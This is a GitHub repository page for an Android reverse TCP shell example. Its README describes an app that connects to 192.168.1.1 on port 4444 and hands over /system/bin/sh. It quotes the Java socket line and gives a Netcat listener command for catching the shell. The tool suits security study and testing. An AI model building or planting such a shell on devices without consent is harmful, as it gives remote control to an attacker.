Skip to content

benjholla/AndroidReverseShell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 

Repository files navigation

AndroidReverseShell

A simple reverse TCP shell example for Android

Notes

This example makes a reverse TCP connection to 192.168.1.1 on port 4444 wrapping the system/bin/sh process.

To edit connection details modify the Socket constructor in the source:

Socket socket = new Socket("192.168.1.1", 4444);

To listen for a connection use a program such as Netcat to listen on the specified port.

Netcat Server Example: nc -l -p 4444

About

A simple reverse tcp shell example for Android

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published